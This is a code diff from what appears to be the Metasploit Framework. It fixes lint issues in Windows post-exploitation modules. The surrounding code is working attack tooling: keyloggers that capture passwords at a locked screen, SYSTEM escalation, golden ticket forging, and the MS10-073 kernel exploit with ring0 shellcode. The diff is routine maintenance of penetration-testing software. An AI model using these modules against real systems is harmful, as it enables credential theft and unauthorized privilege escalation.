Merge pull request #20120 from bcoles/rubocop-modules-post-windows

modules/post/windows: Resolve RuboCop violations

Author: smcintyre-r7

modules/post/windows/capture/keylog_recorder.rb

@@ -45,6 +45,11 @@ def initialize(info = {})
               stdapi_ui_stop_keyscan
             ]
           }
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [],
+          'Reliability' => []
         }
       )
     )
@@ -297,8 +302,8 @@ def keycap
           vprint_status("Session: #{datastore['SESSION']} has been closed. Exiting keylog recorder.")
           rec = 0
         end
-      rescue ::Exception => e
-        if e.class.to_s == 'Rex::TimeoutError'
+      rescue StandardError => e
+        if e.instance_of?(::Rex::TimeoutError)
           @timed_out_age = get_session_age
           @timed_out = true
 
@@ -310,7 +315,7 @@ def keycap
             print_status("Session: #{datastore['SESSION']} is not responding. Exiting keylog recorder.")
             rec = 0
           end
-        elsif e.class.to_s == 'Interrupt'
+        elsif e.instance_of?(::Interrupt)
           print_status('User interrupt.')
           rec = 0
         else
@@ -362,7 +367,7 @@ def finish_up
     begin
       sleep(@interval)
       write_keylog_data
-    rescue ::Exception => e
+    rescue StandardError => e
       print_error("Keylog recorder encountered error: #{e.class} (#{e}) Exiting...") if e.class.to_s != 'Rex::TimeoutError' # Don't care about timeout, just exit
       session.response_timeout = last_known_timeout
       return

modules/post/windows/capture/lockout_keylogger.rb

@@ -34,6 +34,11 @@ def initialize(info = {})
               stdapi_ui_stop_keyscan
             ]
           }
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [SCREEN_EFFECTS],
+          'Reliability' => []
         }
       )
     )
@@ -103,15 +108,16 @@ def keycap(session, keytime, logfile)
         kc = VirtualKeyCodes[vk]
 
         f_shift = fl & (1 << 1)
-        f_ctrl	= fl & (1 << 2)
-        f_alt	= fl & (1 << 3)
+        _f_ctrl = fl & (1 << 2)
+        _f_alt = fl & (1 << 3)
 
         if kc
           name = (((f_shift != 0) && (kc.length > 1)) ? kc[1] : kc[0])
           case name
           when /^.$/
             outp << name
           when /shift|click/i
+            # ignore
           when 'Space'
             outp << ' '
           else
@@ -121,11 +127,13 @@ def keycap(session, keytime, logfile)
           outp << ' <0x%.2x> ' % vk
         end
       end
+
       select(nil, nil, nil, 2)
       file_local_write(logfile, "#{outp}\n")
       if !outp.nil? && (outp.chomp.lstrip != '')
         print_status("Password?: #{outp}")
       end
+
       still_locked = 1
       # Check to see if the screen saver is on, then check to see if they have logged back in yet.
       screensaver = client.railgun.user32.SystemParametersInfoA(114, nil, 1, nil)['pvParam'].unpack('C*')[0]
@@ -144,7 +152,7 @@ def keycap(session, keytime, logfile)
       end
       select(nil, nil, nil, keytime.to_i)
     end
-  rescue ::Exception => e
+  rescue StandardError => e
     if e.message != 'win'
       print_line
       print_status("#{e.class} #{e}")
@@ -154,20 +162,19 @@ def keycap(session, keytime, logfile)
   end
 
   def run
+    # Make sure we are on a Windows host
+    if client.platform != 'windows'
+      print_error('This module does not support this platform.')
+      return
+    end
+
     # Log file variables
     host = session.session_host
-    port = session.session_port
     filenameinfo = '_' + ::Time.now.strftime('%Y%m%d.%M%S')	# Create Filename info to be appended to downloaded files
     logs = ::File.join(Msf::Config.log_directory, 'scripts', 'smartlocker')	# Create a directory for the logs
     ::FileUtils.mkdir_p(logs)	# Create the log directory
     logfile = logs + ::File::Separator + host + filenameinfo + '.txt'	# Logfile name
 
-    # Make sure we are on a Windows host
-    if client.platform != 'windows'
-      print_error('This module does not support this platform.')
-      return
-    end
-
     # Check admin status
     admin = check_admin
     if admin == false
@@ -235,14 +242,13 @@ def run
       end
       client.railgun.user32.LockWorkStation()
       if client.railgun.user32.GetForegroundWindow()['return'] == 0
-        print_error('Locking the workstation falied, trying again..')
+        print_error('Locking the workstation failed, trying again..')
         client.railgun.user32.LockWorkStation()
         if client.railgun.user32.GetForegroundWindow()['return'] == 0
           print_error('The system will not lock this session, nor will it be used for user login, exiting...')
           return
-        else
-          print_status('Locked this time, time to start keyloggin...')
         end
+        print_status('Locked this time, time to start keyloggin...')
       end
     end
 

modules/post/windows/escalate/droplnk.rb

@@ -29,6 +29,11 @@ def initialize(info = {})
               stdapi_fs_getwd
             ]
           }
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [ARTIFACTS_ON_DISK],
+          'Reliability' => []
         }
       )
     )

modules/post/windows/escalate/getsystem.rb

@@ -36,7 +36,10 @@ def initialize(info = {})
             'PrintSpooler',
             'EFSRPC',
             'EfsPotato'
-          ]
+          ],
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [],
+          'Reliability' => []
         }
       )
     )
@@ -64,7 +67,7 @@ def run
     begin
       result = client.priv.getsystem(technique)
       print_good("Obtained SYSTEM via technique #{result[1]}")
-    rescue Rex::Post::Meterpreter::RequestError => e
+    rescue Rex::Post::Meterpreter::RequestError
       print_error('Failed to obtain SYSTEM access')
     end
   end

modules/post/windows/escalate/golden_ticket.rb

@@ -36,6 +36,11 @@ def initialize(info = {})
               stdapi_railgun_api
             ]
           }
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [],
+          'Reliability' => []
         }
       )
     )
@@ -75,13 +80,11 @@ def run
     end
 
     unless krbtgt_hash
-      if framework.db.active
-        print_status('Searching for krbtgt hash in database...')
-        krbtgt_hash = lookup_krbtgt_hash(domain)
-        fail_with(Failure::Unknown, 'Unable to find krbtgt hash in database') unless krbtgt_hash
-      else
-        fail_with(Failure::BadConfig, 'No database, please supply the krbtgt hash')
-      end
+      fail_with(Failure::BadConfig, 'No database, please supply the krbtgt hash') unless framework.db.active
+
+      print_status('Searching for krbtgt hash in database...')
+      krbtgt_hash = lookup_krbtgt_hash(domain)
+      fail_with(Failure::Unknown, 'Unable to find krbtgt hash in database') unless krbtgt_hash
     end
 
     unless domain_sid

modules/post/windows/escalate/ms10_073_kbdlayout.rb

@@ -30,7 +30,7 @@ def initialize(info = {})
           [ 'OSVDB', '68552' ],
           [ 'CVE', '2010-2743' ],
           [ 'MSB', 'MS10-073' ],
-          [ 'URL', 'http://www.reversemode.com/index.php?option=com_content&task=view&id=71&Itemid=1' ],
+          [ 'URL', 'https://web.archive.org/web/20160308010201/http://www.reversemode.com/index.php?option=com_content&task=view&id=71&Itemid=1' ],
           [ 'EDB', '15985' ]
         ],
         'DisclosureDate' => '2010-10-12',
@@ -48,6 +48,11 @@ def initialize(info = {})
               stdapi_sys_process_getpid
             ]
           }
+        },
+        'Notes' => {
+          'Stability' => [CRASH_OS_DOWN],
+          'SideEffects' => [ARTIFACTS_ON_DISK],
+          'Reliability' => []
         }
       )
     )
@@ -56,7 +61,8 @@ def initialize(info = {})
   def run
     mem_base = nil
     dllpath = nil
-    hDll = false
+    hdll = false
+
     version = get_version_info
     unless version.build_number.between?(Msf::WindowsVersion::Win2000, Msf::WindowsVersion::Win7_SP0)
       print_error("#{version.product_name} is not vulnerable.")
@@ -174,7 +180,7 @@ def run
       "\x00\x00\x00\x00\x00\x00"
 
     pid = session.sys.process.getpid
-    print_status('Attempting to elevate PID 0x%x' % pid)
+    print_status(format('Attempting to elevate PID 0x%<pid>x', pid: pid))
 
     # Prepare the shellcode (replace platform specific stuff, and pid)
     ring0_code.gsub!('FFFF', [flink_off].pack('V'))
@@ -200,7 +206,7 @@ def run
       print_error("Unable to open #{dllpath}")
       return
     end
-    hDll = ret['return']
+    hdll = ret['return']
     print_status("Wrote malicious keyboard layout to #{dllpath} ..")
 
     # Allocate some RWX virtual memory for our use..
@@ -209,10 +215,10 @@ def run
     mem_size += (0x1000 - (mem_size % 0x1000))
     mem = session.railgun.kernel32.VirtualAlloc(mem_base, mem_size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE)
     if (mem['return'] != mem_base)
-      print_error('Unable to allocate RWX memory @ 0x%x' % mem_base)
+      print_error(format('Unable to allocate RWX memory @ 0x%<mem_base>x', mem_base: mem_base))
       return
     end
-    print_status(format('Allocated 0x%x bytes of memory @ 0x%x', mem_size, mem_base))
+    print_status(format('Allocated 0x%<mem_size>x bytes of memory @ 0x%<mem_base>x', mem_size: mem_size, mem_base: mem_base))
 
     # Initialize the buffer to contain NO-OPs
     nops = "\x90" * mem_size
@@ -230,21 +236,21 @@ def run
     end
 
     # InitializeUnicodeStr(&uStr,L"pwn3d.dll"); -- Is this necessary?
-    pKLID = mem_base
-    pStr = pKLID + (2 + 2 + 4)
+    pklid = mem_base
+    pstr = pklid + (2 + 2 + 4)
     kbd_name = 'pwn3d.dll'
     uni_name = Rex::Text.to_unicode(kbd_name + "\x00")
-    ret = session.railgun.memwrite(pStr, uni_name, uni_name.length)
+    ret = session.railgun.memwrite(pstr, uni_name, uni_name.length)
     if !ret
       print_error('Unable to copy unicode string data')
       return
     end
     unicode_str = [
       kbd_name.length * 2,
       uni_name.length,
-      pStr
+      pstr
     ].pack('vvV')
-    ret = session.railgun.memwrite(pKLID, unicode_str, unicode_str.length)
+    ret = session.railgun.memwrite(pklid, unicode_str, unicode_str.length)
     if !ret
       print_error('Unable to copy UNICODE_STRING structure')
       return
@@ -257,8 +263,8 @@ def run
       print_error('Unable to GetKeyboardLayout')
       return
     end
-    hKL = ret['return']
-    print_status('Current Keyboard Layout: 0x%x' % hKL)
+    hkl = ret['return']
+    print_status('Current Keyboard Layout: 0x%x' % hkl)
 
 # _declspec(naked) HKL __stdcall NtUserLoadKeyboardLayoutEx(
 #  IN HANDLE Handle,
@@ -284,7 +290,7 @@ def run
         [ 'DWORD', 'dwKLID', 'in' ],
         [ 'DWORD', 'Flags', 'in' ]
       ])
-    ret = session.railgun.ntdll.KiFastSystemCall(dll_fd, 0x1ae0160, nil, hKL, pKLID, 0x666, 0x101)
+    ret = session.railgun.ntdll.KiFastSystemCall(dll_fd, 0x1ae0160, nil, hkl, pklid, 0x666, 0x101)
     print_status(ret.inspect)
 =end
 
@@ -294,11 +300,11 @@ def run
       pop esi
       push 0x101
       push 0x666
-      push #{'0x%x' % pKLID}
-      push #{'0x%x' % hKL}
+      push #{'0x%x' % pklid}
+      push #{'0x%x' % hkl}
       push 0
       push 0x1ae0160
-      push #{'0x%x' % hDll}
+      push #{'0x%x' % hdll}
       push esi
       #{syscall_stub}
     EOS
@@ -313,7 +319,7 @@ def run
       print_error('Unable to copy system call stub')
       return
     end
-    print_status('Patched in syscall wrapper @ 0x%x' % func_ptr)
+    print_status(format('Patched in syscall wrapper @ 0x%<func_ptr>x', func_ptr: func_ptr))
 
     # GO GO GO
     ret = session.railgun.kernel32.CreateThread(nil, 0, func_ptr, nil, 'CREATE_SUSPENDED', nil)
@@ -333,7 +339,7 @@ def run
 
     # Now, send some input to cause ring0 payload execution...
     print_status('Attempting to cause the ring0 payload to execute...')
-    vInput = [
+    vinput = [
       1, # INPUT_KEYBOARD - input type
       # KEYBDINPUT struct
       0x0,  # wVk
@@ -344,26 +350,25 @@ def run
       0x0,  # pad 1
       0x0   # pad 2
     ].pack('VvvVVVVV')
-    ret = session.railgun.user32.SendInput(1, vInput, vInput.length)
+    ret = session.railgun.user32.SendInput(1, vinput, vinput.length)
     print_status('SendInput: ' + ret.inspect)
   ensure
     # Clean up
     if mem_base
       ret = session.railgun.kernel32.VirtualFree(mem_base, 0, MEM_RELEASE)
       if !(ret['return'])
-        print_error('Unable to free memory @ 0x%x' % mem_base)
+        print_error(format('Unable to free memory @ 0x%<mem_base>x', mem_base: mem_base))
       end
     end
 
     # dll_fd.close
-    if hDll
-      ret = session.railgun.kernel32.CloseHandle(hDll)
+    if hdll
+      ret = session.railgun.kernel32.CloseHandle(hdll)
       if !(ret['return'])
         print_error('Unable to CloseHandle')
       end
     end
 
     session.fs.file.rm(dllpath) if dllpath
   end
-
 end